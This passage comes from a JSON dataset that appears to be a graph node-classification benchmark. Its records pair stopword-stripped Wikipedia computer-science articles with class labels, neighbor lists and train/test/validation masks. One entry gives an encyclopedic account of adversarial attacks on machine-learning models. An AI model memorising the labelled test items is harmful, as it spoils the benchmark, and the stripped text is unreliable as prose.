specifically written large number applications ranging games interactive periodic tables found online v200 easily mistaken pda small computer massive enclosure full qwerty keyboard — feature disqualifies calculator use many tests examinations including american act sat ti-89 titanium offers exactly functionality smaller format also legal sat test act test note official page specifies user-available rom amount ti-92 plus 702k sources specify 388k due ti-92+ coming cabri geometry pre-installed uses 314 kb difference",
    "neighbors": [
      7269,
      966,
      9964,
      7772,
      797
    ],
    "mask": "Test"
  },
  {
    "node_id": 9464,
    "label": 9,
    "text": "Css_in_js:css js css-in-js styling technique javascript used style components javascript parsed css generated usually style element attached dom allows abstract css component level using javascript describe styles declarative maintainable way multiple implementations concept form libraries libraries allow create styled components using tagged template literals example using styled components react javascript library project would look like following import styled 'styled-components // create component renders p element blue text const bluetext styled.p bluetext blue text /bluetext another implementation emotion using react would import css jsx emotion/core' const color 'white' render things using css js possible using traditional css techniques make styles dynamic inline conditional statements also allows write modular code css encapsulated block javascript scoping module thousands companies use css-in-js production including reddit patreon target atlassian vogue github coinbase many",
    "neighbors": [
      11221,
      3462
    ],
    "mask": "Test"
  },
  {
    "node_id": 9465,
    "label": 4,
    "text": "Radware:radware radware provider load balancing cybersecurity services data centers radware corporate headquarters located mahwah new jersey international headquarters located tel aviv israel company also offices shanghai china radware member rad group companies shares traded nasdaq radware founded 1997 roy zisapel president ceo director 1999 company initial public offering listed nasdaq stock exchange zisapel holds 3.4 percent stake company father yehuda zisapel largest shareholder 15 percent stake november 2005 radware acquired v secure technologies giving radware intrusion-prevention system/intrusion detection system ips/ids technology run layer 4-7 switch hardware appliances april 2007 radware acquired covelight systems provider web application auditing monitoring tools based cary north carolina us 16 million february 2009 radware acquired nortel ’ application delivery business alteon offers merged brand radware alteon february 2013 radware acquired strangeloop networks leader web-performance optimization wpo solutions e-commerce enterprise applications company sells products worldwide distributors resellers located americas europe middle east africa asia pacific customers include financial services insurance e-commerce manufacturing retail government healthcare education transportation services carriers",
    "neighbors": [
      64,
      9413,
      331,
      3116,
      939,
      5178,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 9466,
    "label": 2,
    "text": "Glossary_of_operating_systems_terms:glossary operating systems terms page glossary operating systems terminology windows",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      6184,
      7217,
      9784,
      10809,
      8251,
      576,
      93,
      10333,
      6239,
      97,
      4194,
      8298,
      7285,
      3702,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      9366,
      6296,
      7325,
      9887,
      5796,
      3248,
      6837,
      8388,
      9932,
      5840,
      7382,
      8410,
      1253,
      1776,
      5363,
      2811,
      5885,
      10499,
      1804,
      273,
      11539,
      7446,
      10016,
      2339,
      2345,
      7983,
      823,
      4409,
      7483,
      11075,
      4423,
      5457,
      1362,
      11601,
      10590,
      8551,
      5492,
      394,
      3978,
      7057,
      10130,
      11667,
      11674,
      8092,
      10145,
      421,
      11184,
      10673,
      6075,
      6078,
      9151,
      6087,
      8136,
      6128,
      5619,
      10235,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 9467,
    "label": 1,
    "text": "Object-relational_mapping:object-relational mapping object-relational mapping orm o/rm o/r mapping tool computer science programming technique converting data incompatible type systems using object-oriented programming languages creates effect virtual object database used within programming language free commercial packages available perform object-relational mapping although programmers opt construct orm tools object-oriented programming data-management tasks act objects almost always non-scalar values example address book entry represents single person along zero phone numbers zero addresses could modeled object-oriented implementation person object attributes/fields hold data item entry comprises person name list phone numbers list addresses list phone numbers would contain phonenumber objects address-book entry treated single object programming language referenced single variable containing pointer object instance various methods associated object method return preferred phone number home address however many popular database products sql database management systems dbms store manipulate scalar values integers strings organized within tables programmer must either convert object values groups simpler values storage database convert back upon retrieval use simple scalar values within program object-relational mapping implements first approach heart problem involves translating logical representation objects atomized form capable stored database preserving properties objects relationships reloaded objects needed storage retrieval functionality implemented objects said persistent implementation-specific details storage drivers generally wrapped api programming language use exposing methods interact storage medium way simpler line paradigms surrounding code following simple example written c code execute query written sql using database engine contrast following makes use orm-job api allowing writing code naturally makes use features language case makes use object representing storage repository methods object frameworks might provide code static methods yet methods may implement object-oriented system often choice paradigm made fit orm best surrounding language design principles usually framework expose filtering querying functionality allowing subsets storage base accessed modified code queries people database whose id value '10 compared traditional techniques exchange object-oriented language relational database orm often reduces amount code needs written disadvantages orm tools generally stem high level abstraction obscuring actually happening implementation code also heavy reliance orm software cited major factor producing poorly designed databases another approach use object-oriented database management system oodbms document-oriented databases native xml databases provide flexibility data modeling oodbmss databases designed specifically working object-oriented values using oodbms eliminates need converting data sql form data stored original object representation relationships directly represented rather requiring join tables/operations equivalent orms document-oriented databases called object-document mappers odms document oriented databases also prevent user shred objects table rows many systems also support xquery query language retrieve datasets object-oriented databases tend used complex niche applications one arguments using oodbms may able execute ad-hoc application-independent queries reason many programmers find home object-sql mapping system even though object-oriented databases able process sql queries limited extent oodbms provide replication sql databases means addressing need ad-hoc queries preserving well-known query patterns variety difficulties arise considering match object system relational database difficulties referred object-relational impedance mismatch alternative implementing orm use native procedural languages provided every major database called client using sql statements data access object dao design pattern used abstract statements offer lightweight object-oriented interface rest application",
    "neighbors": [
      9729,
      3080,
      8201,
      1034,
      10250,
      2063,
      3087,
      10258,
      5669,
      8742,
      9263,
      7742,
      11327,
      2631,
      72,
      11338,
      11362,
      9828,
      102,
      8808,
      6775,
      632,
      8825,
      2681,
      1146,
      3710,
      2688,
      3712,
      7307,
      9896,
      10413,
      5806,
      5808,
      10418,
      3763,
      9397,
      3768,
      11457,
      5314,
      6860,
      9942,
      10471,
      3821,
      6383,
      2819,
      6920,
      9481,
      10505,
      8460,
      1812,
      10518,
      4376,
      5404,
      5408,
      5921,
      290,
      1314,
      7968,
      7461,
      2348,
      7475,
      9527,
      10553,
      7485,
      4416,
      2369,
      5441,
      8518,
      10573,
      4944,
      5460,
      853,
      2901,
      1884,
      860,
      862,
      7518,
      5987,
      9589,
      9079,
      8059,
      899,
      10628,
      5509,
      8582,
      9112,
      4000,
      7074,
      5550,
      5048,
      9144,
      3004,
      3517,
      9661,
      9663,
      2499,
      10193,
      9177,
      987,
      9183,
      10737
    ],
    "mask": "Test"
  },
  {
    "node_id": 9468,
    "label": 2,
    "text": "GM-NAA_I/O:gm-naa i/o gm-naa i/o input/output system general motors north american aviation first operating system ibm 704 computer created 1956 robert l. patrick general motors research owen mock north american aviation based system monitor created 1955 programmers general motors ibm 701 main function gm-naa i/o automatically execute new program one executed finished batch processing formed shared routines programs provided common access input/output devices version system used forty 704 installations",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      10803,
      7733,
      9784,
      10809,
      573,
      576,
      10333,
      97,
      9829,
      6248,
      8298,
      7285,
      9335,
      2168,
      1147,
      2172,
      3197,
      1150,
      2179,
      10883,
      6797,
      9361,
      9366,
      6296,
      9370,
      7325,
      9887,
      7848,
      8879,
      3248,
      6837,
      1219,
      8388,
      6342,
      9932,
      5840,
      1235,
      7382,
      8410,
      1253,
      5363,
      2811,
      2813,
      10499,
      1804,
      273,
      11539,
      789,
      5397,
      3359,
      10016,
      2345,
      1323,
      7983,
      7477,
      823,
      10040,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      7507,
      10590,
      863,
      868,
      3429,
      8551,
      5484,
      5492,
      8063,
      4996,
      394,
      3978,
      7053,
      8077,
      7057,
      11667,
      11673,
      8092,
      6557,
      421,
      11184,
      5562,
      6075,
      6078,
      9151,
      8136,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 9469,
    "label": 4,
    "text": "Certified_Computer_Examiner:certified computer examiner certified computer examiner cce credential demonstrates competency computer forensics cce offered international society computer examiners isfce organization hopes create maintain high standards computer examiners worldwide candidates cce must criminal record adhere isfce code ethics least 18 months professional experience documented training pass online examination well online examination candidates must perform forensic examination least three test media candidates successfully completed requirements isfce considered certified computer examiners members isfce maintain credential certified computer examiner fifty hours education training must completed every two years addition candidates must work least three media period online examination also required every two years recertification",
    "neighbors": [
      6684,
      2558,
      9319
    ],
    "mask": "Test"
  },
  {
    "node_id": 9470,
    "label": 4,
    "text": "BlockDos:blockdos blockdos mississauga ontario canada internet security company provides protection services ddos distributed denial service attacks team network engineers security specialists developers work via company global mitigation scrubbing locations washington dc los angeles ca chicago il dallas tx seattle wa netherlands vancouver bc montreal quebec london uk toronto ontario russia ukraine sweden malaysia typical clients include airlines banks various e-commerce providers education financial services banks brokerages gaming government media blockdos division server4sale secure hosting provider founded 2003 mississauga ontario canada 2005 server4sale created new security division named blockdos initially blockdos reseller mitigation technology providers beginning 2008 blockdos deployed in-house developed technology providing protection ddos global team middle east europe north america combined knowledge experience servers web hosting customer support related market research analysis application development ddos protection blockdos provides protection ddos threats small large enterprises various sectors including government gaming education blockdos ddos protection services include 24/7/365 technical support three communication modes electronic mail telephone live chat able provide 100 gbps mitigation capacity up-time guarantee said 99.9 protects websites via ddos mitigation centers result local ddos protection geo dns provides way direct users closest server proper load balancing clean traffic diverted custom filtering service available ssl supported email protection also offered features include deep packet inspection adaptive filtering flexible content filtering application level filtering rate limiting example blockdos ddos protection process explained case study financial services company solid trust pay early 2013 online editor access matters magazine published study stated case study outlines growing aggression attackers set ddos attacks provoked website performance issues solid trust pay internet infrastructure",
    "neighbors": [
      10417,
      3941
    ],
    "mask": "Test"
  },
  {
    "node_id": 9471,
    "label": 1,
    "text": "HSQLDB:hsqldb hsqldb hyper sql database relational database management system written java jdbc driver supports large subset sql-92 standards offers fast small around 1300 kilobytes version 2.2 database engine offers in-memory disk-based tables embedded server modes available additionally includes tools minimal web server command line gui management tools run applets number demonstration examples run java runtimes version 1.1 upwards including free java implementations kaffe hsqldb available bsd license used database persistence engine many open source software projects openoffice base libreoffice base jitsi voip video-conference client since version 2.6 also used commercial products mathematica installanywhere starting version 8.0 hsqldb version 2.0 three transaction control modes supports table level locks multiversion concurrency control mvcc combination locks mvcc version 1.8.1 supports transaction isolation level 0 read uncommitted hsqldb two main table types used durable read-write data storage i.e. transaction successfully committed guaranteed data survive system failure keep integrity default memory type stores data changes disk form sql script engine start-up commands executed data reconstructed memory another table type cached allows one store data cost slower performance hsqldb engine loads partially synchronizes data disk transaction commits however engine always loads rows affected update memory renders large updates impossible without splitting work smaller parts table types allow access comma-separated values csv files tables participate example queries joins simplify spreadsheet processing read-write non-durable in-memory data storage hsqldb 2.0 supports core features many optional features advanced features include user-defined sql procedures functions schemas datetime intervals updatable views arrays lobs full lateral joins set operations many non-standard functions to_char decode also supported extensions standard sql include user-defined aggregate functions several versions hsqldb released since 2001 early versions based discontinued hypersonicsql database engine version 2.0 released 2010 mostly new code written conform standard sql jdbc 4 specification version 2.3.2 released 2014 fully multi-threaded supports high performance two-phase locking mvcc multiversion concurrency control transaction control models",
    "neighbors": [
      3219,
      10389,
      6166,
      1816,
      10137,
      10921,
      1579,
      4781,
      5677,
      7983,
      9389,
      10286,
      10413,
      6579,
      3636,
      5691,
      7100,
      5441,
      3784,
      5583,
      6993,
      10193,
      9177,
      225,
      1383,
      9320,
      5612,
      4598
    ],
    "mask": "None"
  },
  {
    "node_id": 9472,
    "label": 3,
    "text": "Cell_microprocessor_implementations:cell microprocessor implementations first commercial cell microprocessor cell designed sony playstation 3 ibm designed powerxcell 8i use roadrunner supercomputer ibm published information concerning two different versions cell process early engineering sample designated dd1 enhanced version designated dd2 intended production main enhancement dd2 small lengthening die accommodate larger ppe core reported contain simd/vector execution resources preliminary information released ibm references dd1 variant result early journalistic accounts cell capabilities differ production hardware powerpoint material accompanying sti presentation given dr peter hofstee includes photograph dd2 cell die overdrawn functional unit boundaries also captioned name reveals breakdown silicon area function unit follows additional details concerning internal spe implementation disclosed ibm engineers including peter hofstee ibm chief architect synergistic processing element scholarly ieee publication document includes photograph 2.54 x 5.81 mm spe implemented 90-nm soi technology spe contains 21 million transistors 14 million contained arrays term presumably designating register files local store 7 million transistors logic photograph overdrawn functional unit boundaries also captioned name reveals breakdown silicon area function unit follows understanding dispatch pipes important write efficient code spu architecture two instructions dispatched started clock cycle using dispatch pipes designated even odd two pipes provide different execution units shown table ibm partitioned arithmetic instructions execute even pipe memory instructions execute odd pipe permute unit closely associated memory instructions serves pack unpack data structures located memory simd multiple operand format spu computes efficiently unlike processor designs providing distinct execution pipes spu instruction dispatch one designated pipe competing designs one pipe might designed handle extremely common instructions add permitting two instructions executed concurrently serve increase efficiency unbalanced workflows keeping extremely spartan design philosophy spu execution units multiply provisioned understanding limitations restrictive two pipeline design one key concepts programmer must grasp write efficient spu code lowest level abstraction programmers working higher levels abstraction good compiler automatically balance pipeline concurrency possible tested ibm heavy transformation lighting workload average ipc 1.4 performance profile implementation single spu processor qualified follows entry 2.0 ghz operation 0.9 v represents low power configuration entries show peak stable operating frequency achieved voltage increment general rule cmos circuits power dissipation rises rough relationship v^2 f square voltage times operating frequency though power measurements provided ibm authors lack precision convey good sense overall trend figures show part capable running 5 ghz test lab conditions—though die temperature hot standard commercial configurations first cell processors made commercially available rated ibm run 3.2 ghz operating speed chart suggests spu die temperature comfortable vicinity 30 degrees note single spu represents 6 cell processor die area power figures given table represent small portion overall power budget ibm publicly announced intention implement cell future technology 90 nm node improve power consumption reduced power consumption could potentially allow existing design boosted 5 ghz without exceeding thermal constraints existing products first shrink cell 65 nm node reduction 65 nm reduced existing 230 mm² die based 90 nm process half current size 120 mm² greatly reducing ibm manufacturing cost well 12 march 2007 ibm announced started producing 65 nm cells east fishkill fab chips produced apparently ibms cell blade servers first get 65 nm cells sony introduced third generation ps3 november 2007 40gb model without ps2-compatibility confirmed use 65 nm cell thanks shrunk cell power consumption reduced 200w 135w first known 65 nm-cells clock 6 ghz run 1.3v core voltage demonstrated isscc 2007 would given chip theoretical peak performance 384 gflops fp8 quarter precision 48 gflops fp64 dual precision significant improvement 204.8 gflops peak 25.6gflops fp64 dual precision 90 nm 3.2 ghz cell could provide 8 active spus ibm announced implemented new power-saving features dual power supply sram array version yet long-rumoured cell+ enhanced double precision floating point performance first saw light day mid-2008 roadrunner supercomputer form qs22 powerxcell blades although ibm talked even showed higher-clocked cells clock speed remained constant 3.2 ghz even double precision enabled cell+ roadrunner keeping clockspeed constant ibm instead opted reduce power consumption powerxcell clusters even best ibms blue gene clusters 371 mflops/watt far power-efficient already clusters made conventional cpus 265 mflops/watt lower isscc 2008 ibm announced cell 45 nm node ibm said would require 40 percent less power clockspeed 65 nm predecessor die area would shrink 34 percent 45 nm cell requires less cooling allows cheaper production also use much smaller heatsink mass production initially slotted begin late 2008 moved early 2009 sony ibm toshiba announced begin work cell small 32 nm january 2006 since process shrinks fabs usually happen global individual chip scale merely public commitment take cell 32 nm",
    "neighbors": [
      643,
      1933,
      9126,
      6311,
      306,
      7218,
      6072,
      8120,
      1985,
      3025,
      6738,
      342,
      1115,
      859,
      4060,
      3677,
      9445,
      8937,
      10985,
      4587,
      6004,
      2293,
      1784,
      3323,
      6268,
      6909
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9473,
    "label": 4,
    "text": "Adversarial_machine_learning:adversarial machine learning adversarial machine learning technique employed field machine learning attempts fool models malicious input technique applied variety reasons common attack cause malfunction standard machine learning models machine learning techniques originally designed stationary benign environments training test data assumed generated statistical distribution however models implemented real world presence intelligent adaptive adversaries may violate statistical assumption degree depending adversary technique shows malicious adversary surreptitiously manipulate input data exploit specific vulnerabilities learning algorithms compromise security machine learning system examples include attacks spam filtering spam messages obfuscated misspelling “ bad ” words insertion “ good ” words attacks computer security obfuscating malware code within network packets mislead signature detection attacks biometric recognition fake biometric traits may exploited impersonate legitimate user compromise users template galleries adapt updated traits time 2017 researchers massachusetts institute technology 3-d printed toy turtle texture engineered make google object detection ai classify rifle regardless angle turtle viewed creating turtle required low-cost commercially available 3-d printing technology 2018 google brain published machine-tweaked image dog looked like cat computers humans researchers also discovered methods slightly precisely perturbing appearance stop sign autonomous vehicle classify merge speed limit sign understand security properties learning algorithms adversarial settings following main issues addressed process amounts simulating proactive arms race instead reactive one depicted figures 1 2 system designers try anticipate adversary order understand whether potential vulnerabilities fixed advance instance means specific countermeasures additional features different learning algorithms however proactive approaches necessarily superior reactive ones circumstances reactive approaches suitable improving system security first step arms race described identifying potential attacks machine learning algorithms substantial amount work done direction attacks supervised machine learning algorithms categorized along three primary axes influence classifier security violation cause specificity taxonomy extended comprehensive threat model allows one make explicit assumptions adversary goal knowledge attacked system capability manipulating input data and/or system components corresponding potentially formally-defined attack strategy two main attack scenarios identified according threat model described evasion attacks prevalent type attack may encountered adversarial settings system operation instance spammers hackers often attempt evade detection obfuscating content spam emails malware code evasion setting malicious samples modified test time evade detection misclassified legitimate attacker influence training data assumed clear example evasion image-based spam spam content embedded within attached image evade textual analysis performed anti-spam filters another example evasion given spoofing attacks biometric verification systems machine learning algorithms often re-trained data collected operation adapt changes underlying data distribution instance intrusion detection systems idss often re-trained set samples collected network operation within scenario attacker may poison training data injecting carefully designed samples eventually compromise whole learning process poisoning may thus regarded adversarial contamination training data examples poisoning attacks machine learning algorithms including learning presence worst-case adversarial label flips training data found following reference links adversarial stop signs stop signs look normal human eye classified non-stop signs neural networks primary examples poisoning attacks clustering algorithms increasingly adopted security applications find dangerous illicit activities instance clustering malware computer viruses aims identify categorize different existing malware families generate specific signatures detection anti-viruses signature-based intrusion detection systems like snort however clustering algorithms originally devised deal deliberate attack attempts designed subvert clustering process clustering safely adopted settings remains questionable number defense mechanisms evasion poisoning privacy attacks proposed field adversarial machine learning including software libraries available mainly testing purposes research",
    "neighbors": [
      5245,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9474,
    "label": 1,
    "text": "Pacific_Ocean_Shelf_Tracking_Project:pacific ocean shelf tracking project pacific ocean shelf tracking project post field project census marine life researches behavior marine animals use ocean telemetry data management systems system telemetry consists highly efficient lines acoustic receivers create sections continental shelf along coast pacific northwest acoustic receivers pick signals tagged animals pass along lines allowing documentation movement patterns receivers also allow estimation parameters swimming speed mortality trackers sit seabed continental shelf major rivers world method used improve fishing skills management program started 2002 initially limited study movement ocean-survival hatchery-raised wild salmon pacific northwest successful pilot period program moved tracking trout sharks rockfish lingcod",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9475,
    "label": 3,
    "text": "Socket_FP2:socket fp2 socket fp2 µbga-827 cpu socket notebooks released may 2012 amd apu processors codenamed trinity richland trinity -branded products combine piledriver northern islands vliw4 terascale uvd 3 vce 1 video acceleration amd eyefinity-based multi-monitor support two non-displayport- four displayport monitors",
    "neighbors": [
      3586,
      3588,
      8452,
      9092,
      10375,
      3464,
      4872,
      5645,
      398,
      7058,
      10260,
      2719,
      4767,
      2463,
      2850,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      2764,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      9057,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651,
      11130
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9476,
    "label": 2,
    "text": "CocoonJS:cocoonjs cocoonjs mobile development framework produced ludei.it enables software developers build mobile apps using javascript html5 css3 instead device-specific languages objective-c enables wrapping html css javascript code depending upon platform device extends features html javascript work device platform similar adobe phonegap claims significant improvements",
    "neighbors": [
      10470,
      3462,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 9477,
    "label": 3,
    "text": "Action_Replay:action replay action replay brand name cheating device cheat cartridges created datel action replay available many gaming systems including nintendo ds nintendo dsi nintendo 3ds playstation portable playstation 2 gamecube game boy advance xbox typical cheating options include power-ups level warping display internal game data normally seen player typical features include also known action replay nintendo ds system part main series created datel device usually comes cartridge software disc cable connect device computer unlike future iterations versions communicate directly game memory real time desired game needs inserted within cartridge inserted system codes created using hexadecimal based system datel supplies rich base codes users given ability create codes power-saves action replay related series video-game cheat devices unlike main action replay series cheats modifying game code power-saves store game saves created datel allowing users cheat without modifying game code executed power-saves available game systems wii sd card nintendo 3ds isa-based action replay needs memory-resident drivers real protected mode card grabber trainer slowdown feature also interrupt current game save disk freezer models running firmware 4.0 beyond use eeprom instead rom thus upgradeable december 1998 datel released version windows 95/98",
    "neighbors": [
      10241,
      3779,
      6468,
      5736,
      4364,
      10316,
      8782,
      5617,
      6129,
      5686,
      4764,
      8829
    ],
    "mask": "None"
  },
  {
    "node_id": 9478,
    "label": 7,
    "text": "Village_Telco:village telco village telco initiative build low-cost community telephone network hardware software based suite open-source applications enable entrepreneurs set operate telephone service specific area supporting needs specific community first village telco network established dabba orange farm township near johannesburg south africa users make free local calls dabba subscribers well use pay-as-you-go vouchers make calls 'phones networks technically village telco system consists components together comprise easy-to-use standards-based wireless local do-it-yourself telephone company toolkit goal bringing together make local telephony developing countries cheap virtually free become possible thanks advances open source telephony software dramatic decrease cost wireless broadband technology",
    "neighbors": [
      10271,
      10021,
      527
    ],
    "mask": "Test"
  },
  {
    "node_id": 9479,
    "label": 9,
    "text": "HADES_(software):hades software hades haskins analysis display experiment system refers family signal processing computer programs developed 1980s haskins laboratories philip rubin colleagues provide display analysis multiple channel physiological speech sampled data experimental context principal programmers years project included vance maverick mark tiede marian pressler simon levy significant feature hades incorporation procedural language known spiel signal processing interactive editing language provided creation customization specialized analysis procedures stored text files edited etc. similar functions subroutines programming languages like c fortran hades one earliest signal processing systems integrated language use spiel provided automated procedural analysis large datasets usually speech data multiple-channel physiological data acquired specialized hardware emma magnetometer system previous systems time included ils sti inc. mitsyn system designed bill henke hades written c implemented vax systems running vms although hades still finds limited use functionality eventually replaced commercial systems matlab",
    "neighbors": [
      3960,
      11604,
      2045,
      7326
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9480,
    "label": 7,
    "text": "LandWarNet:landwarnet landwarnet lwn united states army ’ contribution global information grid gig consists globally interconnected end-to-end set army information capabilities associated processes personnel collecting processing storing disseminating managing information demand supporting warfighters policy makers support personnel includes army owned leased leveraged department defense dod /joint communications computing systems services software including applications data security services associated services landwarnet exists enable warfighter mission command previously described battle command u.s. service equivalent efforts landwarnet include navy forcenet air force c2 constellation key document shaping capability development expectation landwarnet military operations future operating capabilities pamphlet describes force operating capabilities foc desired u.s. army near mid long term encompassing full spectrum military operations derived analysis joint concepts army future force concepts documents developed support national military strategy nms strategic planning guidance spg army strategic planning guidance aspg army transformation road map atr army campaign plan acp landwarnet essentially combination set functional applications mission command intelligence logistics etc transmitted integrated network transport space airborne terrestrial infrastructure network terminal utilizing common set network services voice data collaboration mediation storage discovery messaging speed service quality service hosting ia/security netops information assurance information dissemination management network management landwarnet also represents army ’ unified coherent network capabilities development effort bring pieces together focus effort providing soldiers leaders units today future means conduct information-enabled joint warfighting supporting operations landwarnet underpinned integrated architectures enables “ one mission command system ” part “ one network ” facilitates consistent alignment joint capabilities across layers network platforms sensors applications services transport standards design field integrated system systems network provides link soldier sustaining base tailored software applications optimized conducting joint operations gen byrnes cg tradoc back november 2003 determined army needed single name represent tactical networks current future assessment based numerous questions asked jfcom component commanders conference senior generals admirals forum discussion army networks task finding right name given battle command awareness division bcad within tradoc futures center directorate numerous suggestions staffing process name landwarnet stood name inspired jtf warnet program extending littoral battlespace elb advanced concept technology development actd time nov 03 jan 04 name landwarnet initially represented current future tactical networks name caught within relatively short time services dod joint battle management command control jbmc2 document review process feb 2004 cio/g6 army incorporated name represent current future army networks name greater appeal traction military circles congressional level previous name army network i.e army knowledge enterprise ake • landwarnet lwn army ’ part dod information technology infrastructure enables operational forces ’ reach back data form high definition intelligence products voice video data • lwn combination infrastructure services moves information seamless network enables management warfighting business information • lwn key enabler information superiority decision superiority ultimately full spectrum dominance well quality speed decision-making enhanced battle command • lwn integrates applications services network transport across warfighting intelligence business domains enabling leader-centric operations anytime anywhere every echelon part joint force • lwn enables enhanced battle command across full spectrum conflict land cyberspace support natural disasters • lwn creates unprecedented levels flexibility agility logistical support actionable intelligence situational awareness • lwn push voice data video edge tactical formations—ultimately pushing capabilities lower lower modular army ’ brigades battalions soldiers enabling distributed operations required today ’ future operations • recent combat operations highlight critical need mobile communications networks satellite communications range extension provide interoperability within joint force within defense communications network infrastructure • networked communications demonstrated joint network node jnn system blue force tracking enhance speed command increase warfighter ’ ability plan execute operations geographically dispersed battlespace • fielding integration migration robust battle command systems deployed deployable units continues primary focus army • lwn integrates applications services network transport across warfighting intelligence business domains enabling leader-centric operations anytime anywhere every echelon part joint force • lwn enables enhanced battle command across full spectrum conflict land cyberspace support natural disasters • lwn creates unprecedented levels flexibility agility logistical support actionable intelligence situational awareness u.s. army strategic communications guide 2007 • landwarnet lwn army ’ part dod information technology infrastructure enables soldiers reach back data form high definition intelligence products voice video data • lwn army portion dod global information grid gig • lwn move information seamless network better supports soldiers infrastructure supports • lwn combination infrastructure services moves information seamless network enables command control management warfighting business information • army transforming data applications processes achieve knowledge sharing optimizes decision making mission planning performance across army • army consolidating network services area processing centers increase lwn efficiency effectiveness reduce network vulnerabilities • lwn managed defended operated part enterprise global information network",
    "neighbors": [
      7388
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9481,
    "label": 1,
    "text": "Database_abstraction_layer:database abstraction layer database abstraction layer dbal dal application programming interface unifies communication computer application databases sql server db2 mysql postgresql oracle sqlite traditionally database vendors provide interface tailored products leaves application programmer implement code database interfaces would like support database abstraction layers reduce amount work providing consistent api developer hide database specifics behind interface much possible exist many abstraction layers different interfaces numerous programming languages application layer built called database-agnostic lowest level connects database performs actual operations required users level conceptual instruction translated multiple instructions database understands executing instructions correct order allows dal perform conceptual instruction implementation physical layer may use database-specific apis use underlying language standard database access technology database version sql implementation data types operations database-specific level conceptual level consolidates external concepts instructions intermediate data structure devolved physical instructions layer complex spans external physical levels additionally needs span supported databases quirks apis problems level aware differences databases able construct execution path operations cases however conceptual layer defers physical layer actual implementation individual operation external level exposed users developers supplies consistent pattern performing database operations every database treated equally level apparent difference despite varying physical data types operations libraries unify access databases providing single low-level programming interface application developer advantages often speed flexibility tied specific query language subset implement thin layer reach goal sql dialects similar one another application developers use language features possibly providing configurable elements database-specific cases typically user-ids credentials thin-layer allows queries statements run variety database products negligible overhead popular use database abstraction layers among object-oriented programming languages similar api-level abstraction layers object-oriented language like c++ java database represented object whose methods members equivalent thereof programming languages represent various functionalities database also share advantages disadvantages api-level interfaces example database abstraction layer language level would odbc platform-independent implementation database abstraction layer user installs specific driver software odbc communicate database set databases user ability programs communicate odbc relays results back forth user programs database downside abstraction level increased overhead transform statements constructs understood target database alternatively thin wrappers often described lightweight abstraction layers opendbx libzdb finally large projects may develop libraries example libgda gnome software developers know database abstraction layer api instead apis databases application support databases supported bigger time saving using database abstraction layer means requirement new installations utilise specific database i.e new users unwilling unable switch databases deploy existing infrastructure new database technologies emerge software developers wo n't adapt new interfaces production database may replaced desktop-level implementation data developer-level unit tests depending database dal may possible dal add features database dal may use database programming facilities methods create standard unsupported functionality completely new functionality instance dbvolution dal implements standard deviation function several databases support abstraction layer reduce overall speed less depending amount additional code executed database layer abstracts native database interface tries emulate features present database backends slower overall performance especially true database abstraction layers try unify query language well like odbc database abstraction layer provides yet another functional dependency software system i.e given database abstraction layer like anything else may eventually become obsolete outmoded unsupported database abstraction layers may limit number available database operations subset supported supported database backends particular database abstraction layers may fully support database backend-specific optimizations debugging features problems magnify significantly database size scale complexity",
    "neighbors": [
      2688,
      10505,
      1034,
      10258,
      10518,
      11030,
      4376,
      9112,
      7968,
      290,
      1314,
      7074,
      7461,
      8742,
      5546,
      10413,
      5550,
      10925,
      5808,
      10418,
      9527,
      3768,
      7608,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      6465,
      11457,
      8518,
      72,
      5964,
      8781,
      4944,
      853,
      2901,
      9942,
      4056,
      9177,
      987,
      860,
      8539,
      9183,
      11362,
      10471,
      8808,
      7022,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "Train"
  },
  {
    "node_id": 9482,
    "label": 9,
    "text": "Initialization_(programming):initialization programming computer programming initialization initialisation assignment initial value data object variable manner initialization performed depends programming language well type storage class etc. object initialized programming constructs perform initialization typically called initializers initializer lists initialization distinct preceded declaration although two sometimes conflated practice complement initialization finalization primarily used objects variables initialization done either statically embedding value compile time else assignment run time section code performs initialization generally known initialization code may include one-time-only functions opening files object-oriented programming initialization code may part constructor class method initializer instance method setting memory location hexadecimal zeroes also sometimes known clearing often performed exclusive instruction operands specifying variable machine code level since requires additional memory access c/c99/c++ initializer optional part declarator consists '= character followed expression comma-separated list expressions placed curly brackets braces latter list sometimes called initializer list initialization list although term initializer list formally reserved initialization class/struct members c++ see declaration includes initialization commonly called definition many find convenient draw distinction terms declaration definition commonly seen phrase distinction declaration definition ... implying declaration merely designates data object function fact according c++ standard definition declaration still usage declarations definitions although formally incorrect common c examples c++ examples c++ constructor class/struct initializer list within definition prior constructor body important note use initialization list values assigned variable initialized example 0 initialized im example construct codice_1 initializer list sometimes term initializer list also used refer list expressions array struct initializer c++11 provides powerful concept initializer lists means template called std :initializer_list data initialization may occur without explicit syntax program example static variables declared without initializer primitive data types initialized value zero corresponding type static objects class type initialized default constructors",
    "neighbors": [
      8545,
      8262,
      4747,
      7627,
      7026,
      8531,
      7894,
      11446,
      10684,
      7421,
      1343
    ],
    "mask": "Test"
  },
  {
    "node_id": 9483,
    "label": 4,
